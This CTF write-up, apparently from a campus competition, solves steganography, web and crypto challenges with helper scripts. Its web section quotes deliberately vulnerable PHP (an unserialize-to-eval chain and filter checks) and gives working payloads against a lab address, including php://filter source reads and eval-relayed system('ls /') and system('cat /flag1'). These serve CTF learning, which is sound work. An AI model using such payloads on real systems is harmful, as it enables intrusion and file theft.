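A genuine sign-in (warm-up) challenge, yet for some reason it went unsolved.
There is a Baidu Cloud link at the end; downloading it gives this image. Zoom in to see the flag.
The challenge hint makes it obvious that the image height has to be modified.
For JPG images I usually open the file in 010 Editor, find the height and width fields, and change them. Here they were hard to locate, so I searched for
FFC0 and the three bytes after it (I used the third occurrence). It may also be FFC2; just try both.
This gives the flag.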
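The manual FFC0/FFC2 search above can be scripted. This is an added example, not code from the original write-up: it lists every plausible start-of-frame segment with the file offset of its height field and patches a chosen one. The function names and the sample bytes are constructed for illustration.

```python
import struct

# Start-of-frame markers that carry image dimensions (FFC0 baseline, FFC2 progressive, ...)
SOF_MARKERS = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7,
               0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}


def find_sof_segments(data):
    """Return (marker, height_offset, height, width) for each plausible SOF segment.

    Layout after the FFCx marker: 2-byte length, 1-byte precision,
    2-byte height, 2-byte width, 1-byte component count (all big-endian).
    A raw scan is used because embedded thumbnails carry their own SOF,
    which is why one file can produce several hits.
    """
    hits = []
    for i in range(len(data) - 9):
        if data[i] != 0xFF or data[i + 1] not in SOF_MARKERS:
            continue
        length, precision, height, width, ncomp = struct.unpack(
            ">HBHHB", data[i + 2:i + 10])
        # Reject chance byte matches: length must equal 8 + 3 * components
        if precision in (8, 12) and length == 8 + 3 * ncomp:
            hits.append((data[i + 1], i + 5, height, width))
    return hits


def patch_height(data, height_offset, new_height):
    """Return a copy of data with the 2-byte big-endian height replaced."""
    out = bytearray(data)
    out[height_offset:height_offset + 2] = struct.pack(">H", new_height)
    return bytes(out)


def build_sample():
    """Constructed JPEG-like bytes: SOI, a thumbnail-style SOF0, a main SOF2, EOI."""
    def sof(marker, h, w):
        return (bytes([0xFF, marker]) + struct.pack(">HBHHB", 11, 8, h, w, 1)
                + b"\x01\x11\x00")  # one component descriptor
    return b"\xff\xd8" + sof(0xC0, 120, 160) + b"\x00" * 4 + sof(0xC2, 300, 800) + b"\xff\xd9"


if __name__ == "__main__":
    for marker, off, h, w in find_sof_segments(build_sample()):
        print(f"FF{marker:02X} height@0x{off:X} = {h}, width = {w}")
```

The height field starts right after the three bytes (length and precision) that follow the marker, so the reported offset is the position to edit in a hex editor.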
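Extract with binwalk -e, then inspect the extracted files to get the flag.
The hint for this challenge is obvious: look at the end of the file, substitute the whitespace characters to turn them into 0s and 1s, which gives the password, then decrypt with Encrypto as the hint suggests.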
♐︎●︎♋︎♑︎❀︎⬥︎♏︎●︎♏︎♍︎□︎❍︎♏︎♉︎⧫︎□︎♉︎■︎♏︎⬥︎⬧︎♉︎⧫︎□︎♉︎■︎❍︎♍︎♍︎⧫︎♐︎❝︎
https://lingojam.com/WingDing
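Decode the Wingdings symbols to get the flag.
This yields some lines of poetry; viewing them with vim on Kali reveals zero-width character steganography.
Decoding website
This brings "eyes" to mind, so open the file with the SilentEye tool.
Decoding gives the flag.
Unzip, then reverse the bytes to obtain a PNG image.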
Then process the values with Python. Note that characters [2:4] of each value are the meaningful part.
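One way to do that processing, as an added example that is not the author's script: it keeps characters [2:4] of each six-character hex record and, on the assumption that the bytes around them are a repeated position index, uses that index to validate and order the records before trying Base64. The records in SAMPLE are constructed, not the challenge data.

```python
import base64
import binascii


def decode_records(lines):
    """Decode 'IIDDII' hex records: index byte, data byte, same index byte again.

    Only characters [2:4] carry data. The surrounding index (an assumption
    about the format) is used to reject damaged records and restore order.
    """
    payload = {}
    for raw in lines:
        rec = raw.strip().lower()
        if not rec:
            continue  # tolerate blank lines in a pasted dump
        if len(rec) != 6 or rec[0:2] != rec[4:6]:
            raise ValueError(f"malformed record: {raw!r}")
        index = int(rec[0:2], 16)
        if index in payload:
            raise ValueError(f"duplicate index: {index:#04x}")
        payload[index] = int(rec[2:4], 16)
    return bytes(payload[i] for i in sorted(payload))


def try_base64(data):
    """Return the Base64-decoded bytes, or None if data is not strict Base64."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


# Constructed sample: Base64 of b"demo" framed as records and shuffled on purpose
SAMPLE = ["035603", "015a01", "024702", "083d08",
          "056205", "047404", "067706", "073d07"]

if __name__ == "__main__":
    inner = decode_records(SAMPLE)
    print(inner, try_base64(inner))
```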
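The hint for this challenge is very clear.
A brief outline of the approach: find the relevant video from the Bilibili uploader.
Copying the code from it produces an article.
Compare that with the original article; whatever is extra is the flag.
This is a reused challenge; see the original for the details.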
<?php
echo "weekend is worthy to happy!!!! isn't??<BR>";
include 'flag.php';
highlight_file(__FILE__);
$a= $_GET['jiage'];
if($a=='welecome_you_to_jnmc_competition'){
echo $flag;
}
?>
Pass in the expected value through the jiage parameter.
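<?php
class entrance
{
    public $start;
    function __construct($start)
    {
        $this->start = $start;
    }
    // Runs when the object is destroyed, including objects created by unserialize()
    function __destruct()
    {
        $this->start->helloworld();
    }
}
class springboard
{
    public $middle;
    // Runs when an undefined method (here helloworld) is called on this object
    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}
class evil
{
    public $end;
    function __construct($end)
    {
        $this->end = $end;
    }
    // Runs when an undefined property (here hs) is read; evaluates $end as PHP code
    function __get($Attribute)
    {
        eval($this->end);
    }
}
// Request input reaches unserialize() directly
if (isset($_GET['serialize'])) {
    unserialize($_GET['serialize']);
} else {
    highlight_file(__FILE__);
}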
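The end goal is to execute the __get() method of the evil class: entrance::__destruct() calls helloworld() on $start, which triggers springboard::__call(), which in turn reads $middle->hs and triggers evil::__get().
So we construct the payload like this:
First run ls / to locate the flag, then cat the flag file.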
php://filter/convert.base64-encode/resource=index.php
Then try to read the flag.
Layer 1
Bypass it with data://text/plain,Floating in the City
if (file_get_contents($file) !== 'Floating in the City')
    die("you also is younger\n");
Layer 2
if($_REQUEST) {
    foreach($_REQUEST as $value) {
        if(preg_match('/[a-zA-Z]/i', $value))
            die('jie le dan mei wan quan jin !');
    }
}
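Order of $_REQUEST: GET
request_order = "GP"
With this setting POST is parsed after GET, so a POST value replaces the GET value of the same name in $_REQUEST. For parameters that have to be sent via GET, such as zuishuai, it is therefore enough to POST a number under the same name at the same time to bypass the check:
Layer 3 is all array bypasses: on PHP versions before 8, md5() and sha1() return NULL when given an array, so the strict hash comparisons succeed while the values themselves differ.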
if(isset($a)){
    if ( sha1($c) === sha1($d) && $c != $d ){
        if($a!=$b&&md5($a)===md5($b)) {
            echo "I learned to be alone all day, so I got drunk and sang this song to entertain myself";
            echo "\n";
            echo "so the flag give you";
            echo $flag;
        }
    }else{
        echo 'kuaile jiuhai yibu !!!';
    }
}else{
    echo "宝!!! the var is not defined!!!";
}
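With every layer bypassed, the script runs through and prints the flag.
Bypass the filter by relaying the payload through a second GET parameter:
http://192.168.0.104:2031/?c=eval($_GET[1]);&1=system('ls /');
This shows where the flag is.
Then just read the flag:
http://192.168.0.104:2031/?c=eval($_GET[1]);&1=system('cat /flag1');
The approach is brute force.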
enc_flag=[5312672, 6305588, 4569667, 5470333, 9312353, 8433549, 5158071, 6305588, 5158071, 4857929, 6482239, 6845381, 4293045, 7812036, 6845381, 4293045, 5961976, 6662160, 6482239, 4857929, 4293045, 4857929, 8865691, 7031932, 7812036, 6845381, 9773775]
# Each value is 5*g^3 + 66*g - 100 for one character code g; try every printable g
for i in enc_flag:
    for g in range(33, 128):
        if 5 * pow(g, 3) + 66 * g - 100 == i:
            print(chr(g), end='')
The most ordinary RSA there is.
The script:
from Crypto.Util.number import *
p = 7049120988661090136959367990211624032671088374397430253722914704672269343351268486642692858477617370573493581346846411168539408811542592351582581576539221
q = 11595461299251293002401295606096202123601375776115430944343338141843770078346355504245510150744085418550473572002573306023521368183889972175846278163010889
c = 48425576447741107904942007362859939933300480519833273210397511573241220126734053813936424490872852942885069257318462762079636783871415500644717758273774268724488497979368196170897933989184449432995120246590652553995031347596620505647525475638040859263109628716173897321613612254357251120398449111747305089380
e = 0x10001
import gmpy2
# Private exponent: d = e^-1 mod (p-1)(q-1)
d = gmpy2.invert(e, (p - 1) * (q - 1))
print(long_to_bytes(int(gmpy2.powmod(c, d, p * q))))
from Crypto.Util.number import *
n=[77233172536159741192246613655283165880196613060552611951771270688104936106776346258707301903094880666395585340631862009130750364252309591238056576753936210560429561770824923088840307835401343591389063817665516081122335870477455981026885268249200998526090677712273308041387000143133795229713482478393789372621, 70794324572924578170904176367785397571585515343841766471270776641893534562091735386206579244229072036331675198665823877108424439019515198192572105111245725566358049561022661780408911208342637594250037944058109688775177723617220023349151285447135301481172151520373371753145483943469882142519628143415523743463, 93761217774409345065712026096494766259059400214289981179452977682878853429771707722391625256415829980979321889115942716112362554641424767683650504053039711982239972950462675978125739670042221693517477062545050595319035580175500989651485917759297158328957400110168748398966355865895154979662685437655175232187, 124529202589219244628054131473440686077969827415379239572516697161425506945161335214321076138377196624342679966748136249190446302054453599336468401444986625483801237391516131671890908955031274838978095000660651399041484751377373528279323583222966113362380418012251381389500548026241296381301140473951308631467, 60402137932600451202064823101449766068323185392267470715893320550946146689486181577700090960854688975492966004126295374528198973614156097511239714353778658971704224697111332966918059572112633110487150490907161982337993576588831137499701656665339000413922782862243877535428631203689690715707499925757364765349]
c=[25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477, 25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477, 25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477, 25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477, 25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477]
import gmpy2
n1 = n[0]
c1 = c[0]
e = 3
k = 0
# Small exponent: m^3 = c + k*n for some small k, so search for a perfect cube
while True:
    root, exact = gmpy2.iroot(k * n1 + c1, e)
    if exact:
        print(long_to_bytes(int(root)))
        break
    k += 1
It turns out to be nothing but base-family encodings, so write a script to brute-force the layers.
import base64

def b16de(s):
    s = base64.b16decode(s.encode()).decode()
    print('base16')
    return s

def b32de(s):
    s = base64.b32decode(s.encode()).decode()
    print('base32')
    return s

def b64de(s):
    s = base64.b64decode(s.encode()).decode()
    print('base64')
    return s

def main(s):
    # For each layer try base16, then base32, then base64 (at most 15 layers)
    for i in range(15):
        try:
            s = b16de(s)
        except Exception:
            try:
                s = b32de(s)
            except Exception:
                try:
                    s = b64de(s)
                except Exception:
                    # Nothing decodes any more: s is the final plaintext
                    break
    print(s)
    with open('decode.txt', 'w') as f:
        f.write(s)

if __name__ == "__main__":
    with open('flag.txt', 'r') as f:  # the initial file is basic.txt
        s = f.read().strip()  # a trailing newline would break base16/base32 decoding
    main(s)